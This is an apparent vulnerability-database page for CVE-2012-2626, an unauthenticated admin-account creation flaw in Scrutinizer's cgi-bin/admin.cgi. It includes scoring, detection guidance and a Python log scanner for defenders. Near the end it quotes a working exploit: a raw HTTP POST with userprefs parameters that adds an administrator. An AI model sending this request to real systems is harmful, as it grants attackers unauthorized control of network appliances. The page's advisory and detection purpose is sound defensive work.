CVE-2012-2626
Published 2012-07-31
Priority: P2 · 76 · medium · 5 · CVSS 2.0
Vector: AV:N/AC:L/Au:N/C:N/I:P/A:N
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 44.46% (98.6th percentile)
cgi-bin/admin.cgi in the web console in Plixer Scrutinizer (aka Dell SonicWALL Scrutinizer) before 9.5.0 does not require token authentication, which allows remote attackers to add administrative accounts via a userprefs action.
Affected (1 range)

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sonicwall | scrutinizer | < 9.5.0 | 9.5.0 |
Detection & IOCs (extracted from sources)
- Monitor for unauthenticated POST requests to /cgi-bin/admin.cgi containing the 'tool=userprefs' parameter, which indicates an attempt to add an administrative account without token authentication.
- Alert on HTTP POST request bodies to /cgi-bin/admin.cgi containing both 'tool=userprefs' and 'selectedUserGroup=' parameters, as this is the exact exploit payload pattern for adding a privileged account.
- A successful exploit returns a JSON response body of the form {"new_user_id":"<N>"} with HTTP 200 from /cgi-bin/admin.cgi; correlate this response with the POST payload to confirm exploitation.
- The Metasploit auxiliary module targets this vulnerability; look for automated/scripted POST requests to /cgi-bin/admin.cgi without a valid session token from unexpected source IPs.
- The vulnerability exists in Scrutinizer versions before 9.5.0; the endpoint /cgi-bin/admin.cgi does not enforce token authentication in affected versions, meaning any unauthenticated remote request can create admin accounts.
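
Added example (not from the original page or from any vendor rule): the request and response checks listed above, applied to constructed proxy log records and graded from a bare `userprefs` POST up to a confirmed account creation. The JSON field names (`src`, `method`, `path`, `req_body`, `status`, `resp_body`) and the verdict labels are assumptions about the local logging setup.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

TARGET_PATH = "/cgi-bin/admin.cgi"
NEW_USER_RE = re.compile(r'^\s*\{\s*"new_user_id"\s*:\s*"(\d+)"\s*\}\s*$')

# Constructed sample records; field names are assumptions about what a
# reverse proxy or WAF with request/response body logging would emit.
SAMPLE_LOG = "\n".join(json.dumps(r) for r in [
    {"src": "192.0.2.10", "method": "GET", "path": TARGET_PATH + "?tool=userprefs",
     "req_body": "", "status": 200, "resp_body": ""},
    {"src": "198.51.100.7", "method": "POST", "path": TARGET_PATH,
     "req_body": "tool=userprefs&newUser=example&pwd=REDACTED&selectedUserGroup=1",
     "status": 200, "resp_body": '{"new_user_id":"12"}'},
    {"src": "198.51.100.7", "method": "POST", "path": TARGET_PATH,
     "req_body": "selectedUserGroup=1&tool=userprefs", "status": 403, "resp_body": ""},
    {"src": "203.0.113.5", "method": "POST", "path": TARGET_PATH,
     "req_body": "tool=userprefs", "status": 200, "resp_body": "{}"},
    {"src": "203.0.113.5", "method": "POST", "path": "/cgi-bin/login.cgi",
     "req_body": "tool=userprefs&selectedUserGroup=1", "status": 200, "resp_body": ""},
])

def classify(rec):
    """Return (verdict, new_user_id) for a matching record, else None."""
    if str(rec.get("method", "")).upper() != "POST":
        return None
    if urlsplit(rec.get("path", "")).path != TARGET_PATH:
        return None
    # Parse the form body so parameter order and percent-encoding do not matter.
    params = parse_qs(rec.get("req_body") or "", keep_blank_values=True)
    if "userprefs" not in params.get("tool", []):
        return None
    if "selectedUserGroup" not in params:
        return ("userprefs-post", None)
    created = NEW_USER_RE.match(rec.get("resp_body") or "")
    if rec.get("status") == 200 and created:
        return ("account-created", created.group(1))
    return ("account-add-attempt", None)

def scan(log_text):
    alerts = []
    for line in filter(None, map(str.strip, log_text.splitlines())):
        rec = json.loads(line)
        hit = classify(rec)
        if hit:
            alerts.append({"src": rec.get("src"), "verdict": hit[0], "new_user_id": hit[1]})
    return alerts
```

An `account-created` verdict means the logged response matched the success body, so the returned `new_user_id` is the account to look up and remove on the appliance.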
CVSS provenance
- nvd · v2.0 · 5.0 MEDIUM · AV:N/AC:L/Au:N/C:N/I:P/A:N
- vulncheck · 5.0 MEDIUM
GHSA
GHSA-2m69-x28v-rwx9: cgi-bin/admin
ghsa_unreviewed·2022-05-14
CVE-2012-2626 [MEDIUM] CWE-287 GHSA-2m69-x28v-rwx9: cgi-bin/admin
VulnCheck
SonicWall scrutinizer Improper Authentication
vulncheck·2012·CVSS 5.0
CVE-2012-2626 [MEDIUM] SonicWall scrutinizer Improper Authentication
Affected: SonicWall scrutinizer
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2012-2626
SonicWall
vendor_sonicwall·2012-07-31·CVSS 5.0
CVE-2012-2626 [MEDIUM] CWE-287
No detection rules found.
Exploit-DB
Scrutinizer 9.0.1.19899 - HTTP Authentication Bypass
exploitdb·2012-07-30
CVE-2012-2626 Scrutinizer 9.0.1.19899 - HTTP Authentication Bypass
---
source: https://www.securityfocus.com/bid/54727/info
Scrutinizer is prone to an authentication-bypass vulnerability.
Exploiting this issue may allow an attacker to bypass certain security restrictions and perform unauthorized actions.
Scrutinizer 9.5.0 is vulnerable; other versions may also be affected.
#Request
```
POST /cgi-bin/admin.cgi HTTP/1.1
Host: 10.70.70.212
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:11.0) Gecko/20100101 Firefox/11.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 70

tool=userprefs&newUser=trustwave&pwd=trustwave&selectedUserGroup=1
```
#Response
```
HTTP/1.1 200 OK
Date: Wed, 25 Ap
```
Metasploit
Plixer Scrutinizer NetFlow and sFlow Analyzer HTTP Authentication Bypass
metasploit
This will add an administrative account to Scrutinizer NetFlow and sFlow Analyzer without any authentication. Versions such as 9.0.1 or older are affected.
No writeups or analysis indexed.